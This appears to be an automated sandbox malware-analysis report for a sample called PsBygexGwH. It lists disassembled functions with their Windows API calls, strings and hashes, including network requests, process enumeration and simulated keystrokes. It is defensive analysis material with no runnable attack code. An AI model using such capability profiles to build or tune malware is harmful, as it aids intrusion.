Opcode ID: 9c050717863f5de75b38418bcf0344b9901d21600784389c398308346d1b2f48
Instruction ID: 6c5ceee07a0c64ffd204809d1445898c6330973ddb6e0d81cfce641bb20d6693
Opcode Fuzzy Hash: 9c050717863f5de75b38418bcf0344b9901d21600784389c398308346d1b2f48
Instruction Fuzzy Hash: 2F617A75A00248AFDB10DFA8CD81EEE77B8EF09704F10019AFA15E72A1D770AE95DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00152C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00152C94

Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0

_free.LIBCMT ref: 00152CA0
_free.LIBCMT ref: 00152CAB
_free.LIBCMT ref: 00152CB6
_free.LIBCMT ref: 00152CC1
_free.LIBCMT ref: 00152CCC
_free.LIBCMT ref: 00152CD7
_free.LIBCMT ref: 00152CE2
_free.LIBCMT ref: 00152CED
_free.LIBCMT ref: 00152CFB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1ab1cdf9c2dafa212b9dd3e0435d9c1d5367b418c05420117d418bdf1401c694
Instruction ID: 3e0ebdd482c042881de37bbbab9c6c29cecd096a47f90bda75cc000af9241fda
Opcode Fuzzy Hash: 1ab1cdf9c2dafa212b9dd3e0435d9c1d5367b418c05420117d418bdf1401c694
Instruction Fuzzy Hash: 5A11B276100118EFCB02EF94D882CDD3BA5BF16355F4144A4FA58AF322DB31EA549B90

Uniqueness

Uniqueness Score: -1.00%

Function 00121410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00121459
OleUninitialize.OLE32(?,00000000), ref: 001214F8
UnregisterHotKey.USER32(?), ref: 001216DD
DestroyWindow.USER32(?), ref: 001624B9
FreeLibrary.KERNEL32(?), ref: 0016251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0016254B

Strings

close all, xrefs: 00121454

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 8dac98dd3f945fe58dbc41939ab06ee8b8e50bd193da566f35318b6f3415e796
Instruction ID: 0b451849ca832008a82932b9ed444118b713dc960e316439d0e80a6cd18850d8
Opcode Fuzzy Hash: 8dac98dd3f945fe58dbc41939ab06ee8b8e50bd193da566f35318b6f3415e796
Instruction Fuzzy Hash: 44D17031701622DFDB29EF14D899A69F7A4BF25700F1542ADE84A6B251DB30ED32CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00197DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00197FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00197FC1
GetFileAttributesW.KERNEL32(?), ref: 00197FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00198005
SetCurrentDirectoryW.KERNEL32(?), ref: 00198017
SetCurrentDirectoryW.KERNEL32(?), ref: 00198060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001980B0

Strings

*.*, xrefs: 00198066

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: a391c67e8470aded47bb3fbb23c4ec08813ca7bdb6caf8abe8702f5446094390
Instruction ID: 55865dd60f8ca8fb3697051ae2e7011ccd451ea13b26d88a5795d65069d920be
Opcode Fuzzy Hash: a391c67e8470aded47bb3fbb23c4ec08813ca7bdb6caf8abe8702f5446094390
Instruction Fuzzy Hash: 6C81A1725182459BCF24EF14C8459AEB3E8BF99310F584C6EF885D7290EB34ED49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00125BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00125C7A

Part of subcall function 00125D0A: GetClientRect.USER32(?,?), ref: 00125D30
Part of subcall function 00125D0A: GetWindowRect.USER32(?,?), ref: 00125D71
Part of subcall function 00125D0A: ScreenToClient.USER32(?,?), ref: 00125D99

GetDC.USER32 ref: 001646F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00164708
SelectObject.GDI32(00000000,00000000), ref: 00164716
SelectObject.GDI32(00000000,00000000), ref: 0016472B
ReleaseDC.USER32(?,00000000), ref: 00164733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001647C4

Strings

U, xrefs: 00164693

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: f6aa6e87cbfad0cf31f3bc0ef25afaa8bced640fb2a4be0d5e51848c057cb957
Instruction ID: ed6a7bc0452dd57e8dbb8399e16fc7a409ae1846c70837c6b220b6181612f973
Opcode Fuzzy Hash: f6aa6e87cbfad0cf31f3bc0ef25afaa8bced640fb2a4be0d5e51848c057cb957
Instruction Fuzzy Hash: 1771EE31400205EFCF25CF64CD84AFA3BB6FF4A364F184269ED555A2A6D73098A1DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0019359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001935E4

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

LoadStringW.USER32(001F2390,?,00000FFF,?), ref: 0019360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00193724
^ ERROR, xrefs: 001936C9
"%s" (%d) : ==> %s:, xrefs: 00193742
Error: , xrefs: 001936EF
Line %d (File "%s"):, xrefs: 0019366B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 65d91826ccc29cf994b398d988a9c6410fd231c3aa2911df4b407ff7e710ac71
Instruction ID: f8cc5bc45fffe920948fb222ce9ae3fae6f9c8c78cbc93b541982a389bcdae7d
Opcode Fuzzy Hash: 65d91826ccc29cf994b398d988a9c6410fd231c3aa2911df4b407ff7e710ac71
Instruction Fuzzy Hash: 11514A7180021ABACF15EBE1EC42EEEBB78BF24354F144125F115721A1EB311BA9DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0019C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0019C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0019C2CA
GetLastError.KERNEL32 ref: 0019C322
SetEvent.KERNEL32(?), ref: 0019C336
InternetCloseHandle.WININET(00000000), ref: 0019C341

Strings

, xrefs: 0019C2BB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 8c68d4436ea21472b142a84b8478fc20e6529be9a86b1faf5c120c663b3f0ad9
Instruction ID: 3d0a95935ef1d5e9b7b2c4bc87e7b03d57c0fe009b9aa712dc247a826b02e6c5
Opcode Fuzzy Hash: 8c68d4436ea21472b142a84b8478fc20e6529be9a86b1faf5c120c663b3f0ad9
Instruction Fuzzy Hash: 28318EB1600208AFDB219FA4CC88AAB7BFCFB59744F14851EF486D2610DB30DE449BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0018989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00163AAF,?,?,Bad directive syntax error,001BCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001898BC
LoadStringW.USER32(00000000,?,00163AAF,?), ref: 001898C3

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00189987

Strings

Line %d:, xrefs: 00189912
., xrefs: 0018996D
%s (%d) : ==> %s.: %s %s, xrefs: 001898F1
Line %d (File "%s"):, xrefs: 0018992D
Error: , xrefs: 00189955

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: d2ad270723cc6962d880317bcd57318fb0eda222825f291672cb3dbda264e57a
Instruction ID: 64e449bd7ee97e88c5c5a24ab51fc82ca66a57f599daf47343ef14215ac1ffcb
Opcode Fuzzy Hash: d2ad270723cc6962d880317bcd57318fb0eda222825f291672cb3dbda264e57a
Instruction Fuzzy Hash: F4218D31C0021EBBCF15EF90DC06EEE7775BF28304F084469F515660A2EB719A68DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0018209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 001820AB
GetClassNameW.USER32(00000000,?,00000100), ref: 001820C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0018214D

Strings

list, xrefs: 0018212F
SHELLDLL_DefView, xrefs: 001820CC
largeicons, xrefs: 001820E1
details, xrefs: 001820FB
smallicons, xrefs: 00182115

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: e38d5295278d99b5056029b56a11bebf12df74befa9fc15eb85d4031b2d94e8b
Instruction ID: 0ab20f77c9fe1196b720eb7317d5d1fabf9f13185edbccd72289c776af0b32f3
Opcode Fuzzy Hash: e38d5295278d99b5056029b56a11bebf12df74befa9fc15eb85d4031b2d94e8b
Instruction Fuzzy Hash: D9112976688B06BAF7067321DC0BDEB379EDB15328B300116FB05A51E2FFB169415B54

Uniqueness

Uniqueness Score: -1.00%

Function 0015CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0015CEB7
_free.LIBCMT ref: 0015CF22
_free.LIBCMT ref: 0015CF48
_free.LIBCMT ref: 0015CF71
_free.LIBCMT ref: 0015CFA9
_free.LIBCMT ref: 0015CFDA
_free.LIBCMT ref: 0015D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0015D09C
_free.LIBCMT ref: 0015D0B5

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: a1379b4d03c552bd9debaadfadc35f8208385aa0a8ffa765d2ae97de4f6192ee
Instruction ID: 3641675d10f4fb6d86d612905520c2cacc26026c2ea826a5119ebc38d100974d
Opcode Fuzzy Hash: a1379b4d03c552bd9debaadfadc35f8208385aa0a8ffa765d2ae97de4f6192ee
Instruction Fuzzy Hash: 7B612472904310EFDB22AFB4D881A7E7BE5AF16316F04416EFD64AF282D7319949C790

Uniqueness

Uniqueness Score: -1.00%

Function 001B50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 001B5186
ShowWindow.USER32(?,00000000), ref: 001B51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 001B51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 001B51D1

Part of subcall function 001B6FBA: DeleteObject.GDI32(00000000), ref: 001B6FE6

GetWindowLongW.USER32(?,000000F0), ref: 001B520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001B524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 001B5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 001B5296

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: ba8b9edc6ca74aa6f41c814460bd223599be1e85bf8cd2172ba6bba86131b5a5
Instruction ID: b443977fab5f57bb278d2e0ae5c83ad1af019ad2d6b2193dac0b17bdc3052ca8
Opcode Fuzzy Hash: ba8b9edc6ca74aa6f41c814460bd223599be1e85bf8cd2172ba6bba86131b5a5
Instruction Fuzzy Hash: 4551C030A42A08FFEF249F28DC4ABD83B67FB15365F184152F615962E0C7B5A980DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00138B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00176890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001768A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001768B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001768D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001768F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00138874,00000000,00000000,00000000,000000FF,00000000), ref: 00176901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0017691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00138874,00000000,00000000,00000000,000000FF,00000000), ref: 0017692D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: ca72515af33fbccf652122977034165579ea05b672613395942b844ec3089ecf
Instruction ID: f3afe80d7ed9162a3bac8a93d357d192d862ce1b034b0402744b56a797945a5d
Opcode Fuzzy Hash: ca72515af33fbccf652122977034165579ea05b672613395942b844ec3089ecf
Instruction Fuzzy Hash: 29519A7060070AEFDB24CF24CC55FAABBB5FB58354F104618F946A72A0DBB0E990DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0019C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0019C182
GetLastError.KERNEL32 ref: 0019C195
SetEvent.KERNEL32(?), ref: 0019C1A9

Part of subcall function 0019C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0019C272
Part of subcall function 0019C253: GetLastError.KERNEL32 ref: 0019C322
Part of subcall function 0019C253: SetEvent.KERNEL32(?), ref: 0019C336
Part of subcall function 0019C253: InternetCloseHandle.WININET(00000000), ref: 0019C341

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 5b4d348c1eb24d0c9172c4caa48ed83bbee5633fd708ebb7882f15e814bc3989
Instruction ID: 06b5beb1df521952a2515cc4d96bf060c555ba3c95808232a66bc289abd0f232
Opcode Fuzzy Hash: 5b4d348c1eb24d0c9172c4caa48ed83bbee5633fd708ebb7882f15e814bc3989
Instruction Fuzzy Hash: 3E319C71200701EFDF259FA5DC44A66BBF9FF68700B14452DF99682A20DB30E854DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001825A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00183A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00183A57
Part of subcall function 00183A3D: GetCurrentThreadId.KERNEL32 ref: 00183A5E
Part of subcall function 00183A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001825B3), ref: 00183A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 001825BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001825DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001825DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 001825E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00182601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00182605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0018260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00182623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00182627

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 176e1bd5071e62eccfb465eec189e82091ff87afd4978b784f03ac558af5f572
Instruction ID: 1aec96ee07a776cf76640a874374f54ff031e1d0f0e5c3d348ba0ebbaa869dd5
Opcode Fuzzy Hash: 176e1bd5071e62eccfb465eec189e82091ff87afd4978b784f03ac558af5f572
Instruction Fuzzy Hash: F501D470390610BBFB107768DC8AF993F59DB5EB12F100102F368AF1D1CAF225848EA9

Uniqueness

Uniqueness Score: -1.00%

Function 00181803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00181449,?,?,00000000), ref: 0018180C
HeapAlloc.KERNEL32(00000000,?,00181449,?,?,00000000), ref: 00181813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00181449,?,?,00000000), ref: 00181828
GetCurrentProcess.KERNEL32(?,00000000,?,00181449,?,?,00000000), ref: 00181830
DuplicateHandle.KERNEL32(00000000,?,00181449,?,?,00000000), ref: 00181833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00181449,?,?,00000000), ref: 00181843
GetCurrentProcess.KERNEL32(00181449,00000000,?,00181449,?,?,00000000), ref: 0018184B
DuplicateHandle.KERNEL32(00000000,?,00181449,?,?,00000000), ref: 0018184E
CreateThread.KERNEL32(00000000,00000000,00181874,00000000,00000000,00000000), ref: 00181868

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 6c5ae66697c3b0a0813f849eb2c3bea850f85537ab6b648083b5969f7171f169
Instruction ID: c614394d5911d13a38e82b80723e496d44e72fbee17f07cf7199c3dd7fd6286a
Opcode Fuzzy Hash: 6c5ae66697c3b0a0813f849eb2c3bea850f85537ab6b648083b5969f7171f169
Instruction Fuzzy Hash: D301ACB5240304FFE610AFA5DC49F573BACEB89B11F404511FA05EB5A1C67098408B60

Uniqueness

Uniqueness Score: -1.00%

Function 001AA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0018D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0018D501
Part of subcall function 0018D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0018D50F
Part of subcall function 0018D4DC: CloseHandle.KERNEL32(00000000), ref: 0018D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 001AA16D
GetLastError.KERNEL32 ref: 001AA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 001AA1B3
